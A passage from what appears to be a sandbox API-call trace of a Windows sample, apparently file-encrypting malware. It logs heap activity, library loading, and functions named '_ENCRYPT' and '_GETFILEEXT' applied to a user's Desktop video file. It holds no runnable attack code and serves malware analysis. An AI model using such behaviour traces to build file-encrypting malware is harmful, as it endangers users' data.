hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0168.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0168.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0168.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0168.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0168.160] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x9c5180, cbMultiByte=61, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0168.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7a) returned 0x9c0b78 [0168.160] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x9c5180, cbMultiByte=61, lpWideCharStr=0x9c0b78, cchWideChar=61 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wDndAAy--Qv4hO-j v.flv") returned 61 [0168.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0168.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0168.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0168.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0168.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0168.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0168.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0168.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0168.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0168.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0168.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0168.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0168.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0168.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0168.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0168.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0168.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0168.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0168.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0168.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0168.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0168.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0168.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0168.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0168.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0168.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0168.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0168.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0168.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0168.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0168.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0168.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0168.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0168.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0168.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0168.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0168.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0168.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0168.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0168.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0168.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0168.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0168.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0168.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0168.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0168.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0168.163] FreeLibrary (hLibModule=0x75990000) returned 1 [0168.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0168.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0168.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0168.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0168.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0168.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0168.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0168.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0168.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0168.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0168.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0168.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0168.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0168.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0168.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0168.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0168.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0168.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0168.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0168.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0168.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0168.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0168.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0168.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0168.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0168.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0168.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0168.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0168.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0168.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0168.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0168.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0168.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0168.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0168.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0168.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0168.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0168.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0168.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0168.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0168.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0168.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0168.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0168.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0168.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0168.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0168.164] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0168.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0168.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0168.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0168.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0168.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0168.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0168.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0168.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0168.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0168.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0168.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0168.165] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0168.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0168.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0168.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0168.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0168.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0168.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0168.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0168.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0168.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0168.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0168.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0168.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0168.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0168.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0168.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0168.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0168.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0168.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0168.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0168.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0168.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0168.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0168.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0168.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0168.165] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0168.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0168.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0168.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0168.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0168.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0168.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0168.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0168.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0168.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0168.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0168.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0168.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0168.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0168.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0168.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0168.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0168.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0168.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0168.166] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0168.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0168.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0168.166] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0168.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7c8 [0168.166] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd7c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0168.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0168.166] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0168.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0168.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0168.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0168.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0168.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0168.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0168.167] CloseHandle (hObject=0x138) returned 1 [0168.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0168.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0168.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0168.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0168.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0168.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0168.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0168.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0168.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0168.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0168.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0168.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0168.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0168.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0168.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0168.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0168.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0168.167] FreeLibrary (hLibModule=0x75990000) returned 1 [0168.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0168.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0168.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0168.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0168.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0168.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0168.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0168.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0168.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0168.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0168.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0168.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0168.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0168.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0168.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0168.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0168.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0168.168] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0168.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0168.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0168.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0168.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0168.168] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0168.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0168.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0168.168] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0168.168] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0168.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0168.168] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0168.168] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0168.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="flv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".flv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0168.169] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.169] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.169] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.169] FindFirstFileW (in: 